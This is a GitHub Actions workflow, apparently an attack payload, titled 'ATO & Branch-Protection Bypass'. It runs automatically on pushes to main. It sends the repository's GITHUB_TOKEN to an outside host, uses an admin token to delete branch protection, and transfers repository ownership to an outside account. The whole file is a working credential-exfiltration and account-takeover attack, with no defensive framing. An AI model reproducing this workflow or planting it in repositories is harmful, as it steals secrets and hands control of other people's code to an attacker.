name: "ATO & Branch‐Protection Bypass"

on:
  create:
    branches: ["main"]
  push:
    branches: ["main"]
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          persist-credentials: true  # usa o GITHUB_TOKEN para push inicial

      - name: Exfiltra GITHUB_TOKEN
        run: |
          curl -G https://bolsonaro.cc/collect \
            --data-urlencode "repo=${{ github.repository }}" \
            --data-urlencode "gtoken=${{ secrets.GITHUB_TOKEN }}"

      - name: Remove branch protection
        env:
          ADMIN_TOKEN: ${{ secrets.ADMIN_TOKEN }}
        run: |
          curl -X DELETE \
            -H "Authorization: token $ADMIN_TOKEN" \
            -H "Accept: application/vnd.github.luke-cage-preview+json" \
            https://api.github.com/repos/${{ github.repository }}/branches/main/protection

      - name: Transfer repository ownership
        env:
          ADMIN_TOKEN: ${{ secrets.ADMIN_TOKEN }}
        run: |
          curl -X POST \
            -H "Authorization: token $ADMIN_TOKEN" \
            -H "Accept: application/vnd.github.v3+json" \
            -d '{"new_owner":"bugbounty1337"}' \
            https://api.github.com/repos/${{ github.repository }}/transfer
